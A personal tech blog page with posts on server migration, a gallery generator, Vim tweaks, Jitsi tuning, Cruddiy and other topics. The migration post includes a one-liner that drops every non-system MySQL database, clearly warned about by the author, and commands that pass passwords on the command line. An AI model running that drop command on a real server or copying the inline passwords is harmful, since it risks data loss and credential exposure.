    rsync -havzP --delete --stats --exclude '.ssh' root@139.162.180.162:/home/jan/ /home/jan/
    #root home
    rsync -havzP --delete --stats --exclude '.ssh' root@139.162.180.162:/root/ /root/
    #Critical files
    rsync -havzP --delete --stats root@139.162.180.162:/var/lib/prosody/ /home/backup/server.piks.nl/var/lib/prosody
    rsync -havzP --delete --stats root@139.162.180.162:/var/spool/cron/crontabs /home/backup/server.piks.nl/var/spool/cron/crontabs 
    #I want my webserver logs
    rsync -havzP --delete --stats root@139.162.180.162:/var/log/apache2/ /var/log/apache2/
    #Here are most of your config files. Put them somewhere safe for reference
    rsync -havzP --delete --stats root@139.162.180.162:/etc/ /home/backup/server.piks.nl/etc/
    #Most important folder
    rsync -havzP --delete --stats root@139.162.180.162:/var/www/ /var/www/

    You run this ON the new server and PULL in all relevant data FROM the old server.

    The trick is to put this script NOT in /home/jan or /root or any of the other folders that you rsync, because it would get overwritten by rsync.

    Another trick is to NOT copy your .ssh directories. It is bad practice and can really mess things up, since rsync uses SSH to connect. Keep the old and new SSH accounts separated! Use different passwords and/or SSH keys for the old and the new server.

    Apache

    If you installed from package, Apache should be up and running already.

    Extra modules I had to enable:

    a2enmod rewrite socache_shmcb ssl authz_groupfile vhost_alias

    These modules are not enabled by default, but I find most webservers need them.

    Also on Debian Apache you have to edit charset.conf and uncomment the following line:

    AddDefaultCharset UTF-8

    After that you can just copy over your /etc/apache2/sites-available and /etc/apache2/sites-enabled directories from your rsynced folder and you should be good to go.

    If you use certbot, no problem: just copy /etc/letsencrypt over to your new server (from the rsync dump). This will work. They’re just files.

    But for certbot to run you need to install certbot of course AND finish the migration (change the DNS). Otherwise certbot renewals will fail.
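
    Roughly, on the new server that amounts to this (Debian package names; the backup path matches the rsync script above):

    # Install certbot with the Apache plugin
    apt-get install certbot python3-certbot-apache

    # Copy the letsencrypt tree from the rsync dump
    cp -a /home/backup/server.piks.nl/etc/letsencrypt /etc/

    # After the DNS change, verify that renewals work (without touching the certs)
    certbot renew --dry-run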

    Entering the point of no return

    Everything so far was prelude. You now have (most of) your data, a working Apache config with PHP, and an empty database server.

    Now the real migration starts.

    When you have prepared everything as described here above, the actual migration (aka the following steps) should take no more than 10 minutes.

    • Stop cron on the old server

    You don’t want cron to start doing things in the middle of a migration.

    • Stop most things — except SSH and MariaDB/MySQL server — on the old server
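
    On Debian these two steps boil down to something like this; the service names are examples, stop whatever you run, but leave SSH and MariaDB alone:

    # Stop cron so no jobs fire mid-migration
    systemctl stop cron

    # Stop the services that write data, but keep SSH and the database running
    systemctl stop apache2 exim4
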
    • Dump the database on the old server

    The following one-liner dumps all relevant databases to a SINGLE SQL file (I like it that way):

    time echo 'show databases;' | mysql -uroot -pPA$$WORD | grep -v Database| grep -v ^information_schema$ | grep -v ^mysql$ |grep -v ^performance_schema$| xargs mysqldump -uroot -pPA$$WORD --databases > all.sql

    You run this right before the migration, after you have shut down everything on the old server (except the MariaDB server). This will dump all non-MariaDB-specific databases (i.e. YOUR databases). The other databases (information_schema, performance_schema and mysql): don’t mess with those. The new installation has already created those for you.

    If you want to do a trial export and import before the migration, the following one-liner drops all databases (except the default ones) on the new server, so you can start fresh again. This can be handy. Of course DO NOT RUN THIS ON YOUR OLD SERVER. It will drop all databases. Be very, very careful with this one-liner.

    mysql -uroot -pPA$$WORD -e "show databases" | grep -v Database | grep -v mysql | grep -v information_schema | grep -v performance_schema | gawk '{print "drop database " $1 ";select sleep(0.1);"}' | mysql -uroot -pPA$$WORD

    • Run the rsync again

    Rsync everything (including your freshly dumped all.sql file). This rsync will be way faster, since only the changes since the last run will be synced. Next: import the dump on the new server:

    mysql -u root -p < /home/whereveryouhaveputhisfile/all.sql

    You now have a working Apache server and a working MariaDB server with all your data.

    Don’t even think about copying raw InnoDB files. You are in for a world of hurt. Dump to SQL and import. It’s the cleanest solution.

    • Enable new crontab

    Either by copying the files from the old server or just copy paste the crontab -l contents.
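
    For a single user crontab this can be as simple as the following one-liner, run as root on the new server (old server IP and username as used in the rsync script above):

    # Pull the old crontab over SSH and install it for the same user on the new server
    ssh root@139.162.180.162 'crontab -l -u jan' | crontab -u jan -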

    • Change your DNS records!

    After this: the migration is effectively complete!
    Tail your access_logs to see incoming requests, and check the error log for missing things.

    tail -f /var/log/apache2/*access.log

    tail -f /var/log/apache2/*error.log

    Exim

    I also needed exim4 on my new server. That’s easy enough.

    apt-get install exim4

    cp /home/backup/server.piks.nl/etc/exim4/update-exim4.conf.conf /etc/exim4/update-exim4.conf.conf

    Update: it turned out I had to do a little bit more than this.

  • Corbin: static responsive image and video gallery generator

    Corbin: static responsive image and video gallery generator

    In classic yak-shaving fashion, this weekend I created a static responsive image gallery generator.
    It’s one PHP file that — when run from the command line — generates a clean, fast and responsive (aka mobile friendly) video and image gallery with navigation from a directory of images and videos. The output is one single index.html file.

    The generator itself is a single PHP file (~300 LOC). And running it on a sample folder with images and videos looks like this:

    Notice it converts .mov files to .mp4 which are playable in the browser

    The above generates one single index.html, that looks like this on a desktop browser:

    Notice:

    • The evenly spaced grid with a mix of portrait and landscape images also evenly spaced
    • The Fancybox image animations
    • The navigation buttons
    • The slider at the bottom
    • The indication of video files with an SVG play button
    • The autoplay of video files
    • How the user doesn’t leave the gallery page

    In the above example I use both the mouse and keyboard for navigation, both are possible.

    Here you can look at the sample gallery yourself.

    What does it do?

    Here’s what the generator does:

    • Checks for image orientation (landscape vs portrait) issues and fixes those.
    • Generates thumbnails from valid images (png/jpg etc.) with respect to orientation.
    • Converts non-web-friendly video formats (3gp/mov) to mp4 with FFmpeg (few other tools do this!); see the example conversion after this list.
    • Adds a play button overlay to video files, to make them stand out.
    • Generates one index.html file that, together with your image and thumb folders, constitutes your gallery: copy it to any webserver and it will run; you don’t even need PHP to run the gallery (hence static).
    • Generates a nice looking, evenly spaced, grid with thumbs that point to your images and videos and that looks good on mobile.
    • Uses Fancybox to pop and animate images and videos in a container with navigation.
    • Single PHP file that does everything (~300 LOC), you need FFmpeg to process videos, and it pulls in Fancybox via CDN.
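
    For reference, the FFmpeg conversion this boils down to looks roughly like the command below. This is an illustrative sketch, not Corbin’s exact invocation:

    # Convert a .mov to a browser-friendly H.264 mp4 (faststart for progressive playback)
    ffmpeg -i IMG_0001.mov -c:v libx264 -pix_fmt yuv420p -movflags +faststart IMG_0001.mp4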

    Why did I make Corbin?

    Because it’s fun, and because I was looking for a way to quickly share a folder of images and videos, with nice previews (i.e. thumbs), that also is viewable on a smartphone — and that is *not* Google Photos. Most solutions can’t do that.

    Other things I wanted:

    • Portable generator: one single PHP file is just that. It will run on any server with PHP 7.x and FFmpeg.
    • Portable output: one self-contained index.html file, one images folder, one thumbs folder. That’s it. There is no database or a bunch of help files (e.g. CSS).
    • Something understandable: most other solutions are more complex or clutter your system with files. This tool barely touches the original image folder; it just creates one thumb dir and one HTML file (converted videos do get saved in the original image folder).
    • Something malleable. E.g. it’s pretty easy to add the file names to the index.html. Just edit one line of CSS.

    Corbin?

    Yes, because:

    • Anton Corbijn is my favorite photographer
    • Corbin sounds like core bin aka core binary. And this tool does one core thing for me.
    • According to Urban Dictionary a corbin “is a very trust worthy , funny and amazing person”!

    What’s next?

    Corbin does what I need for now. Things that might be added later:

    • Recursive folder gallery generation.
    • Sorting options for images (name, date etc.).
    • Pagination?
    • More templating options?
    • On successive runs don’t convert mp4 videos or regenerate thumbs.
    • More error checking (file types etc.), much more error checking.

    I know there are tons of solutions out there, but this one is mine. And it does exactly what I want.

    Feel free to poke around! I assure you there are bugs.

  • Auto insert date when starting Vim

    I have a file where I keep notes & ideas. And I try to have as little friction as possible when adding ideas to this file. To achieve this I made it so that when I am at my terminal:

    • I type one letter;
    • The file opens in insert mode;
    • the current date and time are inserted;
    • and Vim starts a new line with some indentation so I can start typing right away.

    I edited just two files to achieve this.

    .bashrc

    An alias in .bashrc to type just one letter and start the file in Vim in insert mode:

    ~/.bashrc
    alias i="vim -c 'startinsert' /home/jan/notes/ideas.txt"
    

    .vimrc

    I added two lines to my .vimrc.

    The first inserts the date: 2021-11-05 21:40:50 (conforming to ISO 8601).
    The second starts a fresh new line with four spaces of indentation.

    ~/.vimrc
    autocmd VimEnter ideas.txt $pu=strftime('%Y-%m-%d %H:%M:%S')
    autocmd VimEnter ideas.txt $pu='    '
  • Connecting a Dell 4K monitor to HDMI

    When I installed my new monitor — the Dell S2721QS — and attached it to my Dell laptop, something felt… off. I couldn’t quite put my finger on it: the resolution was fine (3840 x 2160), the screen was fine — brightness, contrast etc. — but the overall experience was more sluggish. Especially when moving my mouse. Ah of course, this new resolution calls for different mouse speed settings! But after fiddling endlessly with those settings I concluded: that ain’t it.

    It’s something else, like I went back to pre-SSD.

    The monitor was connected to the HDMI port of a USB-C connected Dell WD19 dock, was this port faulty? Or maybe the cable? I changed cables, I changed ports, no change. Then I tried plugging in directly to the HDMI port of my laptop — a Dell Latitude 5590. No change.

    Ah maybe I should connect to the Display Port of the dock instead of HDMI. So I broke out the DP cable. Nope, same feeling.

    Hmm things just feel slower, maybe my laptop GPU isn’t handling this too well, nope, GPU graphs look fine.

    And then it hit me:

    It’s the refresh rate, dummy!

    Of course. My 4K screen has a max refresh rate of 60Hz, but the Intel Graphics tool only showed an available max refresh rate of 30Hz, because my HDMI port cannot output 4K@60Hz. Bam!


    So my monitor was connected on 30Hz, and this is not a good experience. Things feel off, sluggish, like your computer is out of breath. Maybe for some people this is barely noticeable but it’s there. So how to solve this?

    As stated I also use a dock, but the ports on the dock (2x HDMI and DP) can’t handle this output either (the bandwidth of the single USB-C port can’t drive 4K@60Hz AND power AND ethernet AND everything else). Here’s what I did, and sadly it involves ditching the dock.

    The USB-C port on the laptop is able to output 4K@60Hz, so I got a USB-C to DisplayPort cable, connected it to my monitor, and it worked. However this means I cannot use the USB-C port to connect to the dock. But I’d rather have no dock than look at a screen that feels… off.

    The difference the right cable makes

  • Thoughts on Clubhouse

    You can’t

    • Listen on demand
    • Restart/replay a conversation
    • Record a conversation or audio snippets
    • Trace back when a conversation started
    • See who is talking, you can only hear them
    • Send (text) messages to other Clubhouse users
    • Share pictures, videos, gifs or audio files
    • Use it on Android

    You can

    • Listen to audio conversations as they happen
    • See avatars of who is in the conversation
    • Start a group audio conversation with people you know
    • See Clubhouse member profiles with who they follow and who follows them
    • Minimize the app and do other things while listening
    • Receive conversation notices, as they happen, based on people you follow*

    What you get

    • Raw, unscripted watercooler conversations

    So there are a lot of things Clubhouse doesn’t do and only a few things it does do. But the almost archaic possibilities of the Clubhouse app are a large part of the appeal. The constraints punctuate the experience.

    Developers, developers, developers

    Ephemeral group conversations are of course as old as humans. And we didn’t even have to wait for the internet and smartphones for this human need to be implemented in technology. Theoretically the Clubhouse experience was already possible — pre-internet — with the plain old telephony system and it is also basically what happens on the amateur radio network frequencies (this is still a thing).

    Remember this bad boy?

    Which is why it is remarkable that it took until 2020 for such an app to exist on a smartphone. Was the idea maybe too simple? No. Clubhouse may be a primal experience but it is also a logical iteration from text messages, Instagram Stories, Snapchat and TikTok. Clubhouse adds something new to this line of — increasingly real-time — social interactions, by taking away a lot of barriers. And by being the only one that is actually real-time.

    The Clubhouse experience is the lowest bar to participation of any social app out there. You don’t have to leave the house, sit at a desk, straighten your hair, you don’t even have to be able to type. It is just you talking or listening to people.

    And Clubhouse strips down the human need for sharing without showing your face (Zoom), or having to be overly creative (TikTok). Remember that Instagram and Snapchat filters are not only successful because they are fun, they also obfuscate what you don’t want to be seen. Clubhouse doesn’t have this problem.

    Realness

    This all boils down to the lowest common denominator of participation of any social app out there, and the result is a very real experience. So real that it hardly makes sense for people to get ‘verified’ (blue checkmarks): you know right away if the person talking is who they say they are. I was listening to a room with Steve Ballmer, and trust me, that was Steve Ballmer.

    It’s the algorithm

    So Clubhouse offers one of the oldest human experiences of just people talking. But here is the really clever part and why we did need the internet and smartphones.
    *The Clubhouse algorithm sends a push notification when conversations you might be interested in are happening. This is probably also the only reason Clubhouse uses profiles and following/followers lists. Because your interests are, of course, based on people you follow. And this — social graph — is exactly what the internet and smartphones bring to the table that the telephone system and amateur radio can’t.

    So now what?

    A lot of Clubhouse conversations are about Clubhouse. Also a lot of people on Clubhouse are talking about social media and social influencing in general. It feels very meta. But I guess that is what typically happens when these things start.

    Clubhouse is the hottest new app at the moment, either because of their clever iOS-only, FOMO-inducing, invite-only approach, or because of the tech VC entourage that pushes the interest for the app, or maybe because the pandemic has emphasized the need for humans to connect. It’s probably a little bit of all of the above. But you also know that because of the app’s success one of these two things will happen: 1. Facebook will buy Clubhouse or 2. Facebook will clone Clubhouse. We’ll see.

    I see different paths forward for Clubhouse and I am curious to see how it will pan out. And the app right now is very bare, which is also the appeal. So it’ll be interesting to see how and whether they will pivot, maybe they will start adding features, maybe they will introduce recording conversations (podcasts)? And they of course will have to find ways to monetize. And they will have to do so all while the question looms: will it stay fun or is it just the newness that is appealing?

  • Merge two images in Windows from right-click context menu

    1. Download and install ImageMagick.
    2. Go to Windows Explorer and type sendto in the address bar. This will open the following path:

      C:\Users\<username>\AppData\Roaming\Microsoft\Windows\SendTo

      The files here will be available as actions from the Windows “Send to” right-click context menu.
    3. Create a new (text) file in this directory and add the following line:

      magick.exe %1 %2 -resize "x%%[fx:max(u.h,v.h)]" +append -set filename: "COMBINED-%%k" "%%[filename:].jpg"

      This is essentially what will be executed when you right click two images anywhere and select the action.
      %1 and %2 are the two files
      – the resize parameter makes sure the two images line up correctly, from here
      +append means the images will be merged side by side — horizontally — as opposed to vertically
      filename uses %k to pass some random value to the generated new filename. Otherwise it would overwrite already existing files with the same name; by generating something unique this doesn’t happen. The word COMBINED is chosen by me; you can change it to whatever you like.

      This line has extra % signs; these are necessary when you run it as a batch script. If you want to run the command from the command line by hand, replace every double %% with a single % (see the example after this list).
    4. Name this file Merge two images side by side.bat or any name you like as long as it ends with .bat, so Windows knows to execute it.
    5. Done!
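
    For a manual run from a regular command prompt, the same command with single % signs and two example file names looks like this:

    magick.exe photo1.jpg photo2.jpg -resize "x%[fx:max(u.h,v.h)]" +append -set filename: "COMBINED-%k" "%[filename:].jpg"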

    And the result looks like this. Click image or here.

  • Podcast: Donald Knuth Lectures on Things a Computer Scientist Rarely Talks About

    I recently read ‘Things a Computer Scientist Rarely Talks About’ by Donald Knuth from 2001. Recommended reading if you like reading about how a world-renowned computer scientist wrote a book about how he wrote a book that deals with another book! Sounds recursive 😏

    That last book is of course the Bible, and the book Knuth wrote about it is ‘3:16 Bible Texts Illuminated’ — published in 1991. And in 1999 Knuth gave a series of lectures at MIT ‘on the general subject of relations between faith and science’. In these lectures he explains how he went about writing this book and the thought process involved. So the lectures make for an enjoyable deep dive on creating such a book and how Knuth’s brain works, paired with discussions and insights on religion and things like eternity and finiteness.

    And it is this series of lectures that is bundled together in ‘Things a Computer Scientist Rarely Talks About’ — almost verbatim. But the lectures have also always been available as audio files (sadly no visuals) on Knuth’s homepage. I listened to those a few years back, and as I read this book I was reminded that I had created an RSS feed for these files, effectively creating a Knuth podcast!

    This is a later picture of Donald Knuth and not from the 1999 lectures. I added the text, of course in the only possible font.
    (I have no copyright on this picture and couldn’t find out who did actually. Feel free to drop me a line if I can accredit you, or if you want it changed.)

    I mostly created the file for myself to have the convenience of listening to the lectures in a podcast player. But I have also dropped the link to the XML file here and there over the years, and I noticed 607 unique IP addresses hit this link this month alone! There are only six lectures and one panel discussion and never any new content, so I am not sure what these numbers mean, if they mean anything at all.

    But I also remembered I had never blogged about this, until now. So without further ado here is the link:

    https://j11g.com/knuth.xml

    You can add this to your favorite podcast player. I have added the feed to Overcast myself so it looks like this which is nice.

    Having the audiofiles available in a podcast player enables you to track progress, speed up/down parts and have an enhanced audio experience.

    I do remember writing an email (no hyphen) to Knuth’s office and I received a nice reply that they thought it was ‘a great idea’, and they were actually also thinking of starting their own podcast ‘based on these materials’. However I haven’t found any link to this yet, so for now it is just this.

    If you are more into video, here is a great conversation Donald Knuth had with Lex Fridman last year. Published exactly a year ago to this day. The video is not embeddable but you can click the image to go there. Recommended.

  • Cruddiy: table relationship support via foreign keys

    Read here what Cruddiy is and what it can do for you: here is the code.

    TLDR: Cruddiy is a no-code Bootstrap 4 PHP form builder for MySQL tables.

    I started Cruddiy when the Covid-19 lockdowns happened this spring, to keep me busy. And I released it on GitHub. After 25 stars 🤩 and 13 forks on GitHub and a couple of really encouraging messages on the original Cruddiy post, I thought it was time for an update.

    🥳 Cruddiy now supports table relationships via foreign keys. 🥳

    This means:

    • You can add new or delete existing table relations by picking columns that have a foreign key relation.
    • You can add specific actions for each table relation, like:
      • ON UPDATE : CASCADE / SET NULL / RESTRICT
      • ON DELETE: CASCADE / SET NULL / RESTRICT
    • Picking specific actions will result in different behavior. Please read up on what these mean (mostly you want ON UPDATE CASCADE and ON DELETE CASCADE).

    Having table relations in place will have the following results for Cruddiy:

    • On the Create form the field will be populated with the correct key information.
    • On the Update form: the correct stored value will be preselected but you can still choose (update) different values from the select list.

    Note 1: the table relationship builder is the first step in the Cruddiy CRUD creation process. However, it is completely safe to ignore this step and move on to the next one! I would even strongly advise skipping it if you are not sure what you need to do, because it might break things. Also, if you just want one or a couple of simple unrelated forms it is perfectly safe to skip this step.

    Note 2: the table relationship builder is of course just a GUI for something you can also do in PHPMyAdmin or MySQL from the commandline. However, Cruddiy makes it visible and easier to work with table relations.
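
    The command-line equivalent is a plain ALTER TABLE statement; a sketch with made-up table and column names:

    -- Add a foreign key from orders.customer_id to customers.id, cascading updates and deletes
    ALTER TABLE orders
      ADD CONSTRAINT fk_orders_customer
      FOREIGN KEY (customer_id) REFERENCES customers (id)
      ON UPDATE CASCADE
      ON DELETE CASCADE;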

    Some screenshots:

    Table relation builder. One existing relation. And a couple of dropdown lists to create new ones. Feel free to skip this step by hitting ‘Continue CRUD Creation Process’.
    In the column form columns with foreign keys are indicated by the blue icon.
    A simple two field table. As you can see the second item is preselected (as it should be). However it is still possible to select a different value.
  • New WordPress theme: Neve

    Frequent visitors might notice a change to the site: I switched WordPress themes.

    I have been a happy user of the Independent Publisher theme since this site started, and I still use it on my other blog. It’s a terrific theme and I like it a lot.

    But because I really like a clean and simple aesthetic, I made quite a few tweaks to it, specifically to the fonts and CSS.

    My favorite themes are usually black and white themes. Two of my favorite examples of this aesthetic are https://kevq.uk/ and https://blog.pragmaticengineer.com/. Both excellent looking sites in my opinion, and a joy to read.

    So I looked closely at those sites and copied a few things from them. For example: both use the gorgeous Merriweather serif font as the main font for the body text. So did my site (this wasn’t the previous theme’s default font). I really like serif fonts; they add a sort of legibility and make big text blocks more readable.

    But I always kept tweaking the theme: letter-spacing, font-size, colors and more, and I was never 100% happy with it. Especially when things looked good on the desktop, it would look a bit off on mobile. Or the other way around.

    Some tweaks I made to the previous theme. Complete listing

    Neve

    Last week I came across this tweet for a new theme called Neve from ThemeIsle and the example was striking enough to give it a try. And I was happily surprised by how easy, complete and fast this theme was out of the box. I have made exactly 0 CSS tweaks to it. What you’re seeing now is default Neve. I have tried *many* themes over the years, and most of them lack something. Neve checks all the boxes for what I have been looking for, for quite some time.

    And even though Neve uses sans-serif fonts, I found this theme to have the most overall consistent experience (desktop and mobile) and the configuration options are plentiful. And it’s really fast: which is really important. My site feels snappier because of it.

    So I made the decision to switch themes. And I like it a lot. The last couple of days I go to my own site and revisit old posts, just to see how they look, and I am always pleased with the appearance. The line-spacing is just right, the header font-weight perfect, it looks good on desktop and mobile, it’s clean and it’s fast.

    Gripes

    There are two gripes.

    1. I noticed when you don’t center an image, the image caption will sort of blend with the text. And it will not really be clear that the caption belongs to the image. The fix is easy though: center your images and the caption will be centered. Another solution could be to make the caption font smaller or use a different shade of grey to make it more distinct.
    2. The other gripe is one I have to examine a little bit closer, but I don’t think the Neve quote blocks look all that good. If anything, a good quote might be best served by a serif font to stand out a bit. This is by no means a deal breaker, but I might take a closer look at it.

    But also I don’t want to tweak too much. I actually really like that I can use this theme with default settings and that it looks really good. So if you’re looking for a great, clean, fast theme: give Neve a try!

  • Jitsi finetuning and customization

    Jitsi offers a great user experience because it doesn’t require an account: you just go to a URL in Chrome and you’re pretty much good to go. You get a full blown video chat environment, complete with grid view, screen sharing and chat options. No add-ons or third-party installations needed. I greatly prefer this over Zoom, Google Hangouts or Microsoft Teams or what have you.

    Jitsi is also a great piece of software to host. And installing and hosting your own video conferencing software has never been easier.

    Chatting with 8 people. No problem. Emojis added for privacy (not a Jitsi feature, yet)

    Here are some tips to run the Jitsi stack smoothly on your server and how to customize Jitsi Meet.

    Tips

    • Put Nginx in front of Jitsi. This helps to handle the bulk of the web requests. Otherwise Java will take care of this, and this is not what Java is particularly good at.
    • Use JRE11 to run jicofo and jitsi-videobridge2. The latest Debian 10 (Buster) comes with both JRE8 and JRE11. Make sure to use JRE11. This made quite a bit of difference in our tests.
    ii openjdk-11-jre-headless:amd64 11.0.7+10-2ubuntu2~18.04 amd64 OpenJDK Java runtime, using Hotspot JIT (headless)
    • Always use the latest Jitsi packages. They get updated quite frequently, and you definitely want the latest. E.g. last Friday the latest release had a bug, this was fixed the same day. So make sure you always run the latest version.
    root@meet01:/# cat /etc/apt/sources.list.d/jitsi-stable.list
    deb https://download.jitsi.org stable/

    We run the following packages.

    ii jitsi-meet 2.0.4548-1 all WebRTC JavaScript video conferences
    ii jitsi-meet-prosody 1.0.4074-1 all Prosody configuration for Jitsi Meet
    ii jitsi-meet-turnserver 1.0.4074-1 all Configures coturn to be used with Jitsi Meet
    ii jitsi-meet-web 1.0.4074-1 all WebRTC JavaScript video conferences
    ii jitsi-meet-web-config 1.0.4074-1 all Configuration for web serving of Jitsi Meet
    ii jitsi-videobridge2 2.1-197-g38256192-1 all WebRTC compatible Selective Forwarding Unit (SFU)
    • Running from package also has the benefit that the package maintainers tune several kernel parameters specifically for video chat during installation. You definitely want this.

    Other tips

    With all of the above you should be good to go. The following two tips are optional and more user specific, if you still run into (bandwidth) issues.

    • Ask clients to scale their video quality to low definition. There is a server wide setting that should theoretically be able to enforce this, but I have not been able to get this to work.
    • Use Chrome. Jitsi does not work on Safari at all, but should work just fine on Firefox. However it seems specifically designed for Chrome. In my experience: when everyone is on Chrome, Jitsi Meet seems to work best.

    Customizing Jitsi Meet

    Every time you upgrade your Jitsi packages, all your custom changes will be overwritten. You can run this script after every upgrade to change your personal settings. Please change appropriate settings for your installation.

    #Run this after a Jitsi upgrade
    
    cp -ripv own-favicon.ico /usr/share/jitsi-meet/images/favicon.ico
    cp -ripv own-watermark.png /usr/share/jitsi-meet/images/watermark.png
    
    sed -i 's/Secure, fully featured, and completely free video conferencing/REPLACE THIS WITH YOUR TITLE TEXT/g' /usr/share/jitsi-meet/libs/app.bundle.min.js
    
    sed -i 's/Go ahead, video chat with the whole team. In fact, invite everyone you know. {{app}} is a fully encrypted, 100% open source video conferencing solution that you can use all day, every day, for free — with no account needed./REPLACE THIS WITH YOUR OWN WELCOME TEXT/g' /usr/share/jitsi-meet/libs/app.bundle.min.js
    
    sed -i 's/Start a new meeting/REPLACE THIS WITH YOUR OWN TEXT/g' /usr/share/jitsi-meet/libs/app.bundle.min.js
    
    sed -i 's/jitsi.org/yourowndomain.com/g' /usr/share/jitsi-meet/interface_config.js
    
    sed -i 's/Jitsi Meet/YOUR OWN TITLE/g' /usr/share/jitsi-meet/interface_config.js
    
    /etc/init.d/jicofo restart && /etc/init.d/jitsi-videobridge2 restart && /etc/init.d/nginx restart && /etc/init.d/prosody restart

  • Ten pieces of software that removed roadblocks

    Successful software is not defined by the number of lines of code or number of clever algorithms. More often than not, successful software is defined by how many roadblocks it removes for the user.

    Sounds obvious, right? But it usually takes a few iterations before software gains critical mass. And to reach a critical mass of users, you need to remove roadblocks. Roadblocks that power users or early adopters don’t mind dealing with, but that make all the difference for regular users.

    Here are some examples of software that was not always first, but that removed the right roadblocks and cleared the road for the masses.

    Netscape (Mosaic)

    Netscape is probably the most classic example of this. You already had the internet and the World Wide Web. And you had Gopher, FTP and SMTP and the likes. But critical mass? You needed something much simpler! Something that didn’t require typing in difficult commands after connecting to some remote server, but a graphical user interface where you could just point and click*. That’s what really brought the masses to the World Wide Web.

    (*You could argue that Windows 95 did exactly the same, eleven years after the Mac did it).

    VLC

    Remember when you had to download specific video codecs for your media player? I do, and trust me, you don’t want to go back to that. VLC was like a breath of fresh air because it took care of all that stuff.

    VLC was not the first (or last) desktop video player. But it was the first that bundled all codecs and made sure you could pretty much throw every imaginable video format at it, and it would just play it! It removed that roadblock.

    YouTube

    Remember emailing videos? Sure that might work. But how can you be sure the receiver has the right codec (see above)? Or that the receiving email provider won’t mark the video as spam or too big for email? YouTube completely removed all barriers for uploading, sharing and viewing videos online in one go. Just from the browser and without a subscription. A lot of roadblocks: gone.

    Spotify

    CDs were already a thing of the past. But downloading, paying for and managing individual songs was still a lot of work. Spotify managed to figure this one out, and it turned out this is actually what a lot of people wanted. Every song available, at all times for a fixed fee? Talk about removing roadblocks.

    WhatsApp

    WhatsApp was not the first or only IM/chat software, not even by a long shot. So why did it succeed (in most parts of the world) as the number one smartphone chat app? Because they removed multiple roadblocks.

    Early on WhatsApp put a lot of time and effort into making sure their software worked on any kind of cellphone, and specifically older, less powerful phones. Remember they offered a Java ME version? Because they understood chat is not a one-way street. It only works when everyone involved has the same access. Founder Jan Koum learned this from personal experience when trying to chat with family on the other side of the world over shabby internet connections.

    And he and co-founder Brian Acton even carried around old phones for a long time. For this exact reason.

    Slack

    I never had a need for Slack (I’ve been using IRC for over 20 years), but I can clearly see what they did: they removed roadblocks.

    Slack still offers pretty much the same core functionality as IRC: persistent group chat (emphasis on persistent). But without the need to choose servers, set up proxies, use intimidating software or deal with all that other difficult stuff. They took care of all that. Oh, and you can share animated gifs.

    iPhone

    The iPhone is an amalgamation of hardware and software. But it probably belongs on this list, for all the same reasons. It was not the first smartphone, but it was the first that did everything right and it didn’t feel second-rate (hardware- and software-wise). Before the iPhone there were many different smartphones in every shape and form, after the iPhone every smartphone looked like the iPhone. That should tell you something.

    Zoom

    I have personally never used Zoom, and from what I learned I probably won’t any time soon. But I can clearly see what’s happening here. All the (dirty) tricks they did with the installer and audio stack: it is all about removing roadblocks. You can be (and should be) critical of these kinds of tricks, but you can’t deny they made Zoom the current go-to app for video group chat, leaving Skype and the likes in the dust.

    (I also think they have the best/easiest to remember name. That probably also helps. I could see it becoming a verb.)

    C programming language

    I may be going out on a limb here, but I think C’s portability is undeniably a large factor in the success of C (among other things). Because C was highly portable, it removed many roadblocks in the years ahead, when many different hardware platforms all needed a higher-level language but did not want to reinvent the wheel. C removed that roadblock and subsequently became a dominant language.

    GPL

    Entering dodgy terrain here. Not actual software, but a license. There are *many* licenses out there. But the GPL was one of the first that removed many important roadblocks around how to share and distribute software, and that paved the way for a whole lot of other things. And it caused an explosion of software in the 80s and 90s (GCC, GNU/Linux et al.)

    Others?

    These are just some examples but I always like to hear others! What software do you think removed a bunch of roadblocks to pave the way for mass adoption?

  • Cruddiy: a no-code Bootstrap CRUD generator

    November 2020: Cruddiy now supports creating and deleting table relations (based on foreign keys) for cascading deletes/updates and prepopulating select lists. Read more here.

    So you have a MySQL database and a user who should be able to do some standard database actions, like Create, Read, Update or Delete database records. Nothing fancy.
    But this is a non-technical user, so you don’t want to give them access to phpMyAdmin, which is too difficult, let alone give them command line access. So you need some simple database forms, built on top of your MySQL database, but you don’t want to handcode the same PHP CRUD pages again!

    Now you can use Cruddiy (CRUD Do It Yourself) and quickly generate clean CRUD pages with zero coding.

    You’ve probably seen pages like this a thousand times before. And if you have a MySQL database you can now make them yourself with just a few clicks.

    Pages like these are generated without writing a single line of code. With proper titles, pagination, actions (view/edit/delete) and sorting included.

    Above is the old Bootstrap 3 look. This is the new Bootstrap 4 look:

    Cruddiy with Bootstrap 4 and search

    I got tired of programming the same pages over and over again for some simple database forms. So in classic yakshaving fashion I decided to automate this, and built a generator that generates PHP CRUD pages.

    Cruddiy is a no-code PHP generator that will generate PHP Bootstrap CRUD pages for your MySQL tables.

    The output of Cruddiy is an /app folder which includes everything you need. You can rename and move this folder anywhere you want and even delete Cruddiy when you’re done (or run it a couple of times more to get your app just the way you like it). Cruddiy is only used to generate the /app folder. And the /app folder is what your user will use.

    Why Cruddiy, tool xyz does the same thing!

    Most MVC frameworks (e.g. Symfony, Django or Yii2) are of course also able to generate CRUD pages for you. I have used all of these. But usually you end up with at least 80 megabytes of code (no joke) and with all kinds of dependencies that you need to deploy and maintain for just a couple of PHP pages! This rubs me the wrong way.
    And of course there are many other PHP CRUD generators around, but they are not libre or, more often than not, built on top of other larger frameworks: so they have the same problem. Or they simply lack something else. So when I couldn’t find anything that fit my needs I decided to make Cruddiy.

    Cruddiy goals and characteristics

    • Simple
      • No dependencies, just pure PHP.
      • Written in PHP and output in PHP. When the generator runs correctly, your generated app will run correctly.
    • Clean
      • Just generate what’s needed, nothing else.
    • Small
      • If it wasn’t obvious from the above, the app it generates should be small. Kilobytes not megabytes.
    • Portable
      • Cruddiy generates everything in one single /app folder. You can move this folder anywhere. You don’t need Cruddiy after generating what you need.
    • Bootstrap
      • Bootstrap looks clean and is relatively simple and small. I use Bootstrap 3 because I like and know it a bit better than 4.

    FAQ

    Why PHP?

    • Love it or hate it: but PHP is ubiquitous. You can download Cruddiy to most webservers and you’re good to go: wget the zip -> unpack -> check webserver permissions (chmod) -> surf to the unpacked folder in your browser and follow the instructions (see the sketch after this list).
    • Cruddiy is of course a sort of templating engine. It stamps out code based on templates. And if PHP is anything, it is in fact by default a template engine itself. So it’s a pretty good language for this kind of thing.
    • Cruddiy only works with MySQL: and MySQL and PHP are of course two peas in a pod.
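
    As for the wget-unpack-surf steps above: in practice that boils down to something like this. The zip URL is just a placeholder, grab the actual archive from wherever you host or clone Cruddiy, and adjust the paths and webserver user for your setup.

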